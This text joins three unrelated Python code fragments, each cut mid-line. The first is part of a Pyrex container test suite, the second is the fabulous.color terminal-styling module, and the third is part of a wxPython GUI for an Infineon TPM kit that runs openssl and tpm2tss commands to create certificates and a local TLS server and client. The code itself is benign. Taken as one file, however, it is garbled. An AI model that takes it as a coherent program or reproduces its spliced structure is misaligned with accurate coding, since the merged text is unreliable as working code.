assertPyrexContainerCommand(self, cmd, **kwargs): return self.assertPyrexHostCommand("pyrex-run %s" % cmd, **kwargs) def assertPyrexContainerShellPTY( self, *args, returncode=0, env=None, quiet_init=False, bitbakedir="" ): container_cmd_file = self._write_container_command(args) host_cmd_file, _ = self._write_host_command( ["pyrex-shell %s" % container_cmd_file], quiet_init=quiet_init, bitbakedir=bitbakedir, ) stdout = [] def master_read(fd): while True: data = os.read(fd, 1024) if not data: return data stdout.append(data) old_env = None try: if env: old_env = os.environ.copy() os.environ.clear() os.environ.update(env) status = pty.spawn(["/bin/bash", host_cmd_file], master_read) finally: if old_env is not None: os.environ.clear() os.environ.update(old_env) self.assertFalse( os.WIFSIGNALED(status), msg="%s died from a signal: %s" % (" ".join(args), os.WTERMSIG(status)), ) self.assertTrue( os.WIFEXITED(status), msg="%s exited abnormally" % " ".join(args) ) self.assertEqual( os.WEXITSTATUS(status), returncode, msg="%s failed" % " ".join(args) ) return (b"".join(stdout)).decode("utf-8").rstrip() class PyrexImageType_base(PyrexTest): """ Base image tests. All images that derive from a -base image should derive from this class """ def test_init(self): self.assertPyrexHostCommand("true") def test_pyrex_shell(self): self.assertPyrexContainerShellCommand("exit 3", returncode=3) def test_pyrex_run(self): self.assertPyrexContainerCommand("/bin/false", returncode=1) def test_in_container(self): def capture_pyrex_state(*args, **kwargs): capture_file = os.path.join(self.thread_dir, "pyrex_capture") if self.provider == "podman": self.assertPyrexContainerShellCommand( "cp --no-preserve=all /proc/1/cmdline %s" % capture_file, *args, **kwargs ) with open(capture_file, "rb") as f: return f.read() else: self.assertPyrexContainerShellCommand( "cat /proc/self/cgroup > %s" % capture_file, *args, **kwargs ) with open(capture_file, "r") as f: return f.read() def capture_local_state(): if self.provider == "podman": with open("/proc/1/cmdline", "rb") as f: return f.read() else: with open("/proc/self/cgroup", "r") as f: return f.read() local_state = capture_local_state() pyrex_state = capture_pyrex_state() self.assertNotEqual(local_state, pyrex_state) def test_quiet_build(self): env = os.environ.copy() env["PYREX_BUILD_QUIET"] = "1" self.assertPyrexHostCommand("true", env=env) def test_bad_provider(self): # Prevent container build from working os.symlink("/bin/false", os.path.join(self.bin_dir, self.provider)) # Verify that attempting to run build pyrex without a valid container # provider shows the installation instructions output = self.assertPyrexHostCommand("true", returncode=1, capture=True) self.assertIn("Unable to run", output) def test_ownership(self): # Test that files created in the container are the same UID/GID as the # user running outside test_file = os.path.join(self.thread_dir, "ownertest") if os.path.exists(test_file): os.unlink(test_file) self.assertPyrexContainerShellCommand( 'echo "$(id -un):$(id -gn)" > %s' % test_file ) s = os.stat(test_file) self.assertEqual(s.st_uid, os.getuid()) self.assertEqual(s.st_gid, os.getgid()) with open(test_file, "r") as f: (username, groupname) = f.read().rstrip().split(":") self.assertEqual(username, pwd.getpwuid(os.getuid()).pw_name) self.assertEqual(groupname, grp.getgrgid(os.getgid()).gr_name) def test_owner_env(self): # This test is primarily designed to ensure that everything is passed # correctly through 'pyrex run' if self.provider == "podman": self.skipTest("Rootless podman cannot change to another user") conf = self.get_config() # Note: These config variables are intended for testing use only conf["run"]["uid"] = "1337" conf["run"]["username"] = "theuser" conf["run"]["groups"] = "7331:thegroup 7332:othergroup" conf["run"]["initcommand"] = "" conf.write_conf() # Make a fifo that the container can write into. We can't just write a # file because it won't be owned by running user and thus can't be # cleaned up old_umask = os.umask(0) self.addCleanup(os.umask, old_umask) fifo = os.path.join(self.thread_dir, "fifo") os.mkfifo(fifo) self.addCleanup(os.remove, fifo) os.umask(old_umask) output = [] def read_fifo(): nonlocal output with open(fifo, "r") as f: output = f.readline().rstrip().split(":") thread = threading.Thread(target=read_fifo) thread.start() try: self.assertPyrexContainerShellCommand( 'echo "$(id -u):$(id -g):$(id -un):$(id -gn):$USER:$GROUP:$(id -G):$(id -Gn)" > %s' % fifo ) finally: thread.join() self.assertEqual(output[0], "1337") self.assertEqual(output[1], "7331") self.assertEqual(output[2], "theuser") self.assertEqual(output[3], "thegroup") self.assertEqual(output[4], "theuser") self.assertEqual(output[5], "thegroup") self.assertEqual(output[6], "7331 7332") self.assertEqual(output[7], "thegroup othergroup") def test_rlimit_nofile(self): if self.provider != "podman": self.skipTest("Only podman needs rlimit changes") (soft, hard) = resource.getrlimit(resource.RLIMIT_NOFILE) try: resource.setrlimit(resource.RLIMIT_NOFILE, (hard / 2, hard)) s = self.assertPyrexContainerShellCommand( "ulimit -n && ulimit -Hn", capture=True, quiet_init=True ) self.assertEqual(tuple(int(lim) for lim in s.split()), (hard, hard)) finally: resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard)) def test_bind_from_PYREX_BIND(self): temp_dir = tempfile.mkdtemp("-pyrex") self.addCleanup(shutil.rmtree, temp_dir) temp_file = os.path.join(temp_dir, "data") env = os.environ.copy() env["PYREX_BIND"] = temp_dir self.assertPyrexContainerShellCommand("echo 123 > %s" % temp_file, env=env) with open(temp_file, "r") as f: self.assertEqual(f.read(), "123\n") def test_duplicate_binds(self): temp_dir = tempfile.mkdtemp("-pyrex") self.addCleanup(shutil.rmtree, temp_dir) conf = self.get_config() conf["run"]["bind"] += " %s %s" % (temp_dir, temp_dir) conf.write_conf() self.assertPyrexContainerShellCommand("true") def test_missing_bind(self): temp_dir = tempfile.mkdtemp("-pyrex") self.addCleanup(shutil.rmtree, temp_dir) missing_bind = os.path.join(temp_dir, "does-not-exist") conf = self.get_config() conf["run"]["bind"] += " %s" % missing_bind conf.write_conf() s = self.assertPyrexContainerShellCommand( "test -e %s" % missing_bind, capture=True, returncode=1 ) self.assertRegex(s, r"Error: bind source path \S+ does not exist") def test_optional_bind(self): temp_dir = tempfile.mkdtemp("-pyrex") self.addCleanup(shutil.rmtree, temp_dir) missing_bind = os.path.join(temp_dir, "does-not-exist") conf = self.get_config() conf["run"]["bind"] += " %s,optional" % missing_bind conf.write_conf() self.assertPyrexContainerShellCommand("test ! -e %s" % missing_bind) def test_readonly_bind(self): temp_dir = tempfile.mkdtemp("-pyrex") self.addCleanup(shutil.rmtree, temp_dir) temp_file = "%s/test.txt" % temp_dir with open(temp_file, "w") as f: f.write("foo\n") conf = self.get_config(defaults=True) conf["run"]["bind"] += " %s" % temp_dir conf.write_conf() self.assertPyrexContainerShellCommand("echo bar1 > %s" % temp_file) with open(temp_file, "r")
# -*- coding: utf-8 -*- # # Copyright 2016 The Fabulous Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ fabulous.color ~~~~~~~~~~~~~~ The color module provides an object-oriented abstraction for stylized text inside the terminal. This includes things like bold text, blinking text, 4-bit ANSI colors, 8-bit xterm256 colors, and 24-bit "truecolor" colors. """ import sys import functools from fabulous.compatibility import printy from fabulous import utils, xterm256, grapefruit try: unicode = unicode except NameError: unicode = str basestring = (str, bytes) OVERLINE = u'\u203e' def esc(*codes): """Produces an ANSI escape code string from a list of integers This is a low level function that is abstracted by the other functions and classes in this module. """ return "\x1b[%sm" % (";".join([str(c) for c in codes])) class ColorString(object): r"""Abstract base class for stylized string-like objects. Subclasses make it possible to compose stylized text:: >>> str(red("hello")) '\x1b[31mhello\x1b[39m' >>> str(bold(red("hello"))) '\x1b[1m\x1b[31mhello\x1b[39m\x1b[22m' >>> str(plain("hello ", bold("world"))) 'hello \x1b[1mworld\x1b[22m' These objects also provide string length without taking into consideration the ANSI escape codes:: >>> len(red("hello")) 5 >>> len(str(red("hello"))) 15 >>> len(bold(red("hello"))) 5 >>> len(bold("hello ", red("world"))) 11 If you have the wcwidth module installed, it will be used for computing lengths:: """ sep = "" fmt = "%s" def __init__(self, *items): self.items = items def __str__(self): return self.fmt % (self.sep.join([unicode(s) for s in self.items])) def __repr__(self): return repr(unicode(self)) if sys.version_info[0] > 2: def __len__(self): try: import wcwidth # We use: # * wcwidth.wcswidth(item) to find the length of strs # * len(str(item)) to find the length of a bytes object # * len(item) for everything else. return sum([ wcwidth.wcswidth(item) if isinstance(item, str) else len(str(item)) if isinstance(item, bytes) else len(item) for item in self.items ]) except ModuleNotFoundError: return sum([len(str(item)) if isinstance(item, bytes) else len(item) for item in self.items]) else: def __len__(self): return sum([len(item) for item in self.items]) def __add__(self, cs): if not isinstance(cs, (basestring, ColorString)): msg = "Concatenatation failed: %r + %r (Not a ColorString or str)" raise TypeError(msg % (type(cs), type(self))) return ColorString(self, cs) def __radd__(self, cs): if not isinstance(cs, (basestring, ColorString)): msg = "Concatenatation failed: %r + %r (Not a ColorString or str)" raise TypeError(msg % (type(self), type(cs))) return ColorString(cs, self) @property def as_utf8(self): """A more readable way to say ``unicode(color).encode('utf8')`` """ return unicode(self).encode('utf8') def join(self, iterable): """ This works just like `str.join()`, but for ColorStrings! For example: >>> from fabulous.color import * >>> l = [ ... fg256("green", "napster good"), ... fg256("red", "fire bad"), ... ] >>> print(plain(" ").join(l)) """ ret = None for x in iterable: if ret is None: ret = x else: ret += self ret += x return ret class ColorString256(ColorString): r"""Base class for 256-color stylized string-like objects. See the :class:`.fg256`, :class:`.bg256`, :class:`.highlight256`, and :class:`.complement256` classes for more information. """ def __init__(self, color, *items): (r, g, b) = parse_color(color) self.color = xterm256.rgb_to_xterm(r, g, b) self.items = items def __str__(self): return self.fmt % ( self.color, self.sep.join([unicode(s) for s in self.items])) class ColorStringTrue(ColorString): r"""Base class for 24-bit "truecolor" stylized string-like objects. See the :class:`.fgtrue`, :class:`.bgtrue`, :class:`.highlighttrue`, and :class:`.complementtrue` classes for more information. """ def __init__(self, color, *items): self.color = parse_color(color) self.items = items def __str__(self): return self.fmt % ( self.color[0], self.color[1], self.color[2], self.sep.join([unicode(s) for s in self.items])) class plain(ColorString): r"""Plain text wrapper This class is useful for concatenating plain strings with :class:`.ColorString` objects. For example:: from fabulous.color import plain >>> len(plain("hello ", bold("kitty"))) 11 """ pass class bold(ColorString): r"""Bold text wrapper This class creates a string-like object containing bold or bright text. It also brightens the foreground and background colors. This is supported by all terminals that support ANSI color codes. Example usage:: from fabulous.color import bold print bold('i am bold!') print plain('hello ', bold('world')) The ANSI escape codes are as follows:: >>> str(bold("hello")) '\x1b[1mhello\x1b[22m' """ fmt = esc(1) + "%s" + esc(22) class italic(ColorString): r"""Italic text wrapper This class creates a string-like object containing italic text, which is supported by almost no terminals. The ANSI escape codes are as follows:: >>> str(italic("hello")) '\x1b[3mhello\x1b[23m' """ fmt = esc(3) + "%s" + esc(23) class underline(ColorString): r"""Underline text wrapper This class creates a string-like object containing underline text. This is supported by SOME terminals, as documented in the terminal support section. Example usage:: from fabulous.color import underline print underline('i am underlined!') print plain('hello ', underline('world')) The ANSI escape codes are as follows:: >>> str(underline("hello")) '\x1b[4mhello\x1b[24m' """ fmt = esc(4) + "%s" + esc(24) class underline2(ColorString): r"""Alternative underline text wrapper See also: :class:`.underline`. The ANSI escape codes are as follows:: >>> str(underline2("hello")) '\x1b[21mhello\x1b[24m' """ fmt = esc(21) + "%s" + esc(24) class strike(ColorString): r"""Strike-through text wrapper This class creates a string-like object containing strike-through text, which is supported by very few terminals. Example usage:: from fabulous.color import strike print strike('i am stricken!') print plain('hello ', strike('world')) The ANSI escape codes are as follows:: >>> str(strike("hello")) '\x1b[9mhello\x1b[29m' """ fmt = esc(9) + "%s" + esc(29) class blink(ColorString): r"""Blinking text wrapper This class creates a string-like object containing blinking text. This is supported by SOME terminals, as documented in the terminal support section. Example usage:: from fabulous.color import blink print blink('i am underlined!') print plain('hello ', blink('world')) The ANSI escape codes are as follows:: >>> str(blink("hello")) '\x1b[5mhello\x1b[25m' """ fmt = esc(5) + "%s" + esc(25) class flip(ColorString): r"""Flips background and foreground colors For example:: from fabulous.color import flip, red print flip(red('hello')) Is equivalent to the following on a black terminal:: from fabulous.color import black, red_bg print red_bg(black('hello')) The ANSI escape codes are as follows:: >>> str(flip("hello")) '\x1b[7mhello\x1b[27m' """ fmt = esc(7) + "%s" + esc(27) class black(ColorString): r"""Black foreground text wrapper This class creates a string-like object containing text with a black foreground. Example usage:: from fabulous.color import black print black('i am black!') print plain('hello ', black('world')) Text can be made dark grey by using :class:`.bold`:: from fabulous.color import bold, black print bold(black('i am dark grey!')) The ANSI escape codes are as follows:: >>> str(black("hello")) '\x1b[30mhello\x1b[39m' """ fmt = esc(30) + "%s" + esc(39) class red(ColorString): r"""Red foreground text wrapper This class creates a string-like object containing text with a red foreground. Example usage:: from fabulous.color import red print red('i am red!') print plain('hello ', red('world')) Text can be made bright red by using :class:`.bold`:: from fabulous.color import bold, red print bold(red('i am bright red!')) The ANSI escape codes are as follows:: >>> str(red("hello")) '\x1b[31mhello\x1b[39m' """ fmt = esc(31) + "%s" + esc(39) class green(ColorString): r"""Green foreground text wrapper This class creates a string-like object containing text with a green foreground. Example usage:: from fabulous.color import green print green('i am green!') print plain('hello ', green('world')) Text can be made bright green by using :class:`.bold`:: from fabulous.color import bold, green print bold(green('i am bright green!')) The ANSI escape codes are as follows:: >>> str(green("hello")) '\x1b[32mhello\x1b[39m' """ fmt = esc(32) + "%s" + esc(39) class yellow(ColorString): r"""Yellow foreground text wrapper This class creates a string-like object containing text with a "yellow" foreground, which in many terminals is actually going to look more brownish. Example usage:: from fabulous.color import yellow print yellow('i am yellow brownish!') print plain('hello ', yellow('world')) Text can be made true bright yellow by using :class:`.bold`:: from fabulous.color import bold, yellow print bold(yellow('i am bright yellow!')) The ANSI escape codes are as follows:: >>> str(yellow("hello")) '\x1b[33mhello\x1b[39m' """ fmt = esc(33) + "%s" + esc(39) class blue(ColorString): r"""Blue foreground text wrapper This class creates a string-like object containing text with a blue foreground. Example usage:: from fabulous.color import blue print blue('i am dark blue!') print plain('hello ', blue('world')) Text can be made
-extensions v3_ca -out CA_rsa_cert.pem -subj '/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA'\n") self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") def OnGenKeyPair1(self, evt): self.text_server.AppendText("Generating SERVER key-pair...\n") wx.CallLater(10, self.OnGenKeyPair) def OnGenKeyPair(self): if (exec_cmd.ownerAuth !=""): exec_cmd.execCLI([ "tpm2tss-genkey", "-o",exec_cmd.ownerAuth, "-a", "rsa", "rsa_server.tss", ]) self.text_server.AppendText("'tpm2tss-genkey -o %s -a rsa rsa_server.tss'\n" %exec_cmd.ownerAuth) else: exec_cmd.execCLI([ "tpm2tss-genkey", "-a", "rsa", "rsa_server.tss", ]) self.text_server.AppendText("Generating SERVER key-pair: 'tpm2tss-genkey -a rsa rsa_server.tss'\n") self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") def OnGenCSR1(self, evt): self.text_server.AppendText("Creating Certificate Signing Request...\n") wx.CallLater(10, self.OnGenCSR) def OnGenCSR(self): if (exec_cmd.ownerAuth !=""): f = open("temp.conf", "w+") f.write(exec_cmd.openssl_cnf) f.close() #~ self.text_server.AppendText("Creating Certificate Signing Request:\n") command_output = exec_cmd.execCLI([ "openssl", "req", "-new", "-config","temp.conf", "-engine", "tpm2tss", "-key", "rsa_server.tss", "-keyform", "engine", "-subj", "/CN=TPM_UI/O=Infineon/C=SG", "-out", "server_rsa.csr", ]) self.text_server.AppendText(str(command_output)) self.text_server.AppendText("openssl req -new -config temp.conf -engine tpm2tss -key rsa_server.tss -keyform engine -subj /CN=TPM_UI/O=Infineon/C=SG -out server_rsa.csr\n") self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") else: command_output = exec_cmd.execCLI([ "openssl", "req", "-new", "-engine", "tpm2tss", "-key", "rsa_server.tss", "-keyform", "engine", "-subj", "/CN=TPM_UI/O=Infineon/C=SG", "-out", "server_rsa.csr", ]) self.text_server.AppendText(str(command_output)) self.text_server.AppendText("openssl req -new -engine tpm2tss -key rsa_server.tss -keyform engine -subj /CN=TPM_UI/O=Infineon/C=SG -out server_rsa.csr\n") self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") def OnGenCert(self, evt): self.text_server.AppendText("Creating Server Certificate...\n") if (exec_cmd.ownerAuth !=""): f = open("temp.conf", "w+") f.write(exec_cmd.openssl_cnf) f.close() openssl_cmd="OPENSSL_CONF=temp.conf openssl x509 -req -in server_rsa.csr -CA CA_rsa_cert.pem -CAkey rsa_CA.tss -engine tpm2tss -CAkeyform engine -out CAsigned_rsa_cert.crt -days 365 -sha256 -CAcreateserial" server_proc = exec_cmd.createProcess(openssl_cmd, server_log) #~ command_output = exec_cmd.execCLI([ #~ "OPENSSL_CONF=temp.conf", "openssl", "x509", #~ "-req", "-in", "server_rsa.csr", #~ "-CA","CA_rsa_cert.pem", #~ "-CAkey", "rsa_CA.tss", "-engine tpm2tss", #~ "-CAkeyform", "engine", #~ "-out", "CAsigned_rsa_cert.crt", #~ "-days", "365", "-sha256", "-CAcreateserial", #~ ]) #~ self.text_server.AppendText(str(command_output)) self.text_server.AppendText("OPENSSL_CONF=temp.conf openssl x509 -req -in server_rsa.csr -CA CA_rsa_cert.pem -CAkey rsa_CA.tss -engine tpm2tss -CAkeyform engine -out CAsigned_rsa_cert.crt -days 365 -sha256 -CAcreateserial\n") else: command_output = exec_cmd.execCLI([ "openssl", "req", "-x509", "-sha256", "-engine", "tpm2tss", "-key", "rsa_CA.tss", "-keyform", "engine", "-in", "server_rsa.csr", "-out", "CAsigned_rsa_cert.crt", ]) self.text_server.AppendText(str(command_output)) self.text_server.AppendText("openssl req -x509 -sha256 -key rsa_CA.tss -engine tpm2tss -keyform engine -in server_rsa.csr -out CAsigned_rsa_cert.crt\n") self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") def OnStartServer(self, evt): global server_proc,client_proc,server_log global server_thread global RSA_Server_thread_active_flag,RSA_Client_thread_active_flag if (server_proc is not None): RSA_Server_thread_active_flag=0 if (client_proc is not None): RSA_Client_thread_active_flag=0 print("Client Thread Active..killing it: %d \n" % client_proc.pid) kill_child_processes(client_proc.pid) client_proc.terminate() client_proc.wait() client_proc = None print("Server Thread Active..killing it: %d \n" % server_proc.pid) kill_child_processes(server_proc.pid) #server_proc.stdin.write("stop\n") #server_thread.raise_exception() #server_thread.join() server_proc.terminate() server_proc.wait() server_proc = None else: #server_proc = exec_cmd.createProcess("lxterminal --title=Server --geometry=55x24 --command='openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss'", server_log) if (exec_cmd.ownerAuth !=""): openssl_cmd="OPENSSL_CONF=temp.conf openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss" else: openssl_cmd="openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss" server_proc = exec_cmd.createProcess(openssl_cmd, server_log) server_thread = RSA_Server_Thread(1, server_proc) server_thread.start() wx.CallAfter(Publisher.sendMessage, "Server_Text", msg="\n\n" + openssl_cmd +"\n\n") def OnStartClient(self, evt): global client_proc,client_log,server_proc global RSA_Client_thread_active_flag,RSA_Server_thread_active_flag if (client_proc is not None): RSA_Client_thread_active_flag=0 print("Client Thread Active..killing it: %d \n" % client_proc.pid) kill_child_processes(client_proc.pid) client_proc.terminate() client_proc.wait() client_proc = None else: #client_proc = exec_cmd.createProcess("lxterminal --title=Server --geometry=55x24 --command='openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss'", server_log) openssl_cmd="openssl s_client -connect localhost:4433 -tls1_2 -CAfile CA_rsa_cert.pem" if (server_proc is not None): client_proc = exec_cmd.createProcess(openssl_cmd, client_log) client_thread = RSA_Client_Thread(2, client_proc) client_thread.start() wx.CallAfter(Publisher.sendMessage, "Client_Text", msg="\n\n" +openssl_cmd+"\n\n") else: wx.CallAfter(Publisher.sendMessage, "Client_Text", msg="Server is not active..\n") def OnWriteServer(self, evt): global server_proc if (server_proc is None): self.text_server.AppendText("Server is not running!\n") return write_value = self.input_server.GetValue() if (write_value == ""): self.text_server.AppendText("I need something to write!\n") return server_proc.stdin.write((write_value+"\n").encode()) server_proc.stdin.flush() def OnWriteClient(self, evt): global client_proc if (client_proc is None): self.text_client.AppendText("Client is not running!\n") return write_value = self.input_client.GetValue() if (write_value == ""): self.text_client.AppendText("I need something to write!\n") return client_proc.stdin.write((write_value+"\n").encode()) client_proc.stdin.flush() class Tab_ECC_CS(wx.Panel): def __init__(self, parent): wx.Panel.__init__(self, parent) # declare the sizers mainsizer = wx.BoxSizer(wx.HORIZONTAL) steps_sizer = wx.BoxSizer(wx.VERTICAL) server_sizer = wx.BoxSizer(wx.VERTICAL) client_sizer = wx.BoxSizer(wx.VERTICAL) # instantiate the objects button_gen_ca = wx.Button(self, -1, 'Generate CA && CA Cert', size = (-1, 48)) button_gen_keypair = wx.Button(self, -1, 'Create Keypair (for server)', size = (-1, 48)) button_gen_csr = wx.Button(self, -1, 'Create CSR', size = (-1, 48)) button_gen_cert = wx.Button(self, -1, 'Create Server Cert', size = (-1, 48)) button_start_server = wx.Button(self, -1, 'Start/Stop Server') button_start_client = wx.Button(self, -1, 'Start/Stop Client') button_write_from_server = wx.Button(self, -1, 'Write to Client') button_write_from_client = wx.Button(self, -1, 'Write to Server') button_flush_client = wx.Button(self, -1, 'Clear client text', size = (-1, 48)) button_flush_server = wx.Button(self, -1, 'Clear server text', size = (-1, 48)) self.text_client = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | wx.TE_READONLY)) self.text_server = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | wx.TE_READONLY)) self.text_client.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)) self.text_server.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)) self.input_client = wx.TextCtrl(self, -1,value="Send from Client") self.input_server = wx.TextCtrl(self, -1,value="Send from Server") backimage = wx.Image('../images/back.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap() backbutton = wx.BitmapButton(self, -1, backimage) # ~backbutton = wx.BitmapButton(self, -1, img.back.getBitmap()) # attach the objects to the sizers mainsizer.Add(steps_sizer, 0, wx.EXPAND | wx.LEFT | wx.TOP | wx.BOTTOM, 5) mainsizer.Add(server_sizer, 1, wx.EXPAND | wx.RIGHT | wx.TOP | wx.BOTTOM, 5) mainsizer.Add(client_sizer, 1, wx.EXPAND | wx.RIGHT | wx.TOP | wx.BOTTOM, 5) steps_sizer.Add(button_gen_ca, 0, wx.EXPAND | wx.ALL, 5) steps_sizer.Add(button_gen_keypair, 0, wx.EXPAND | wx.ALL, 5) steps_sizer.Add(button_gen_csr, 0, wx.EXPAND | wx.ALL, 5) steps_sizer.Add(button_gen_cert, 0, wx.EXPAND | wx.ALL, 5) steps_sizer.Add(button_flush_server, 0, wx.EXPAND | wx.ALL, 5) steps_sizer.Add(button_flush_client, 0, wx.EXPAND | wx.ALL, 5) steps_sizer.AddSpacer(236) steps_sizer.Add(backbutton, 0, wx.ALL, 5) server_sizer.Add(self.text_server, 1, wx.EXPAND | wx.ALL, 5) server_sizer.Add(button_start_server, 0, wx.EXPAND | wx.ALL, 5) server_sizer.Add(self.input_server, 0, wx.EXPAND | wx.ALL, 5) server_sizer.Add(button_write_from_server, 0, wx.EXPAND | wx.ALL, 5) client_sizer.Add(self.text_client, 1, wx.EXPAND | wx.ALL, 5) client_sizer.Add(button_start_client, 0, wx.EXPAND | wx.ALL, 5) client_sizer.Add(self.input_client, 0, wx.EXPAND | wx.ALL, 5) client_sizer.Add(button_write_from_client, 0, wx.EXPAND | wx.ALL, 5) # Set tooltips button_gen_ca.SetToolTip(wx.ToolTip("Generate Key Pair and Self-Signed Certificate for the Certificate Authority (CA).")) button_gen_keypair.SetToolTip(wx.ToolTip("Generate Key Pair for the Server.")) button_gen_csr.SetToolTip(wx.ToolTip("Generate Certificate Signing Request (CSR) for the CA, from the Server's private key.")) button_gen_cert.SetToolTip(wx.ToolTip("Generate Server Certificate from the CSR and the CA's private key.")) # declare and bind events self.Bind(wx.EVT_BUTTON, self.OnFlushClient, button_flush_client) self.Bind(wx.EVT_BUTTON, self.OnFlushServer, button_flush_server) self.Bind(wx.EVT_BUTTON, self.OnGenCA1, button_gen_ca) self.Bind(wx.EVT_BUTTON, self.OnGenKeyPair1, button_gen_keypair) self.Bind(wx.EVT_BUTTON, self.OnGenCSR1, button_gen_csr) self.Bind(wx.EVT_BUTTON, self.OnGenCert, button_gen_cert) self.Bind(wx.EVT_BUTTON, self.OnStartServer, button_start_server) self.Bind(wx.EVT_BUTTON, self.OnStartClient, button_start_client) self.Bind(wx.EVT_BUTTON, self.OnWriteServer, button_write_from_server) self.Bind(wx.EVT_BUTTON, self.OnWriteClient, button_write_from_client) self.Bind(wx.EVT_BUTTON, self.OnBack, backbutton) # Setup Publisher for text field update Publisher.subscribe(self.Upd_Server_Status, "ECC_Server_Text") Publisher.subscribe(self.Upd_Client_Status, "ECC_Client_Text") self.SetSizer(mainsizer) # declare threads related parameters self.Server_thread_active_flag=0 self.Client_thread_active_flag=0 self.server_proc=None self.client_proc=None def server_thread(self): try: while self.Server_thread_active_flag==1 : line = self.server_proc.stdout.readline() if line != '': wx.CallAfter(Publisher.sendMessage, "ECC_Server_Text", msg=line) finally: self.Server_thread_active_flag=0 print("Exit ECC server Thread\n") wx.CallAfter(Publisher.sendMessage, "ECC_Server_Text", msg="Server Stopped..\n") def client_thread(self): while self.Client_thread_active_flag==1 : line = self.client_proc.stdout.readline() if line != '': wx.CallAfter(Publisher.sendMessage, "ECC_Client_Text", msg=line) self.Client_thread_active_flag=0 print("Exit ECC client Thread\n") wx.CallAfter(Publisher.sendMessage, "ECC_Client_Text", msg="Client Stopped..\n") def Upd_Server_Status(self,msg): self.text_server.AppendText(msg) def Upd_Client_Status(self,msg): self.text_client.AppendText(msg) def OnBack(self, evt): #~ if (self.server_proc is not None): #~ self.Server_thread_active_flag=0 #~ if (self.client_proc is not None): #~ self.Client_thread_active_flag=0 #~ print "Client Thread Active..killing it: %d \n" % self.client_proc.pid #~ kill_child_processes(self.client_proc.pid) #~ self.client_proc.terminate() #~ self.client_proc.wait() #~ self.client_proc = None #~ print "Server Thread Active..killing it: %d \n" % self.server_proc.pid #~ kill_child_processes(self.server_proc.pid) #~ self.server_proc.terminate() #~ self.server_proc.wait() #~ self.server_proc = None self.Parent.Parent.OnCloseWindow(None) def Destroy(self): if (self.server_proc is not None): self.Server_thread_active_flag=0 if (self.client_proc is not None): self.Client_thread_active_flag=0 print("Client Thread Active..killing it: %d \n" % self.client_proc.pid) kill_child_processes(self.client_proc.pid) self.client_proc.terminate() self.client_proc.wait() self.client_proc = None print("Server Thread Active..killing it: %d \n" % self.server_proc.pid) kill_child_processes(self.server_proc.pid) self.server_proc.terminate() self.server_proc.wait() self.server_proc = None def OnFlushClient(self, evt): self.text_client.Clear() def OnFlushServer(self, evt): self.text_server.Clear() def OnGenCA1(self, evt): self.text_server.AppendText("Generating CA key-pair...\n") wx.CallLater(10, self.OnGenCA) def OnGenCA(self): exec_cmd.execCLI(["rm", "ecc_CA.tss", ]) exec_cmd.execCLI(["rm", "CA_ecc_cert.pem", ]) exec_cmd.execCLI(["rm", "ecc_server.tss", ]) exec_cmd.execCLI(["rm", "server_ecc.csr", ]) exec_cmd.execCLI(["rm", "CAsigned_ecc_cert.crt", ]) if (exec_cmd.ownerAuth !=""): f = open("temp.conf", "w+") f.write(exec_cmd.openssl_cnf) f.close() exec_cmd.execCLI([ "tpm2tss-genkey", "-a", "ecdsa", "-o",exec_cmd.ownerAuth, "ecc_CA.tss", ]) self.text_server.AppendText("'tpm2tss-genkey -a ecdsa -o %s ecc_CA.tss'\n" % exec_cmd.ownerAuth) self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") self.text_server.AppendText("Creating Self-Signed Certificate:\n") command_output = exec_cmd.execCLI([ "openssl", "req", "-new", "-config","temp.conf", "-engine", "tpm2tss", "-key", "ecc_CA.tss", "-keyform", "engine", "-x509", "-sha256", "-days", "7300", #~ "-extensions", "v3_ca", "-subj", "/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA", "-out", "CA_ecc_cert.pem", ]) self.text_server.AppendText(str(command_output)) self.text_server.AppendText("openssl req -config temp.conf -key ecc_CA.tss -new -x509 -days 7300 -sha256 -engine tpm2tss -keyform engine -extensions v3_ca -out CA_ecc_cert.pem -subj '/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA'\n") self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") else: exec_cmd.execCLI([ "tpm2tss-genkey", "-a", "ecdsa", "ecc_CA.tss", ]) self.text_server.AppendText("Generating CA key-pair: 'tpm2tss-genkey -a ecdsa ecc_CA.tss'\n") self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") self.text_server.AppendText("Creating Self-Signed Certificate:\n") command_output = exec_cmd.execCLI([ "openssl", "req", "-new", "-engine", "tpm2tss", "-key", "ecc_CA.tss", "-keyform", "engine", "-x509", "-sha256", "-days", "7300", #~ "-extensions", "v3_ca", "-subj", "/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA", "-out", "CA_ecc_cert.pem",
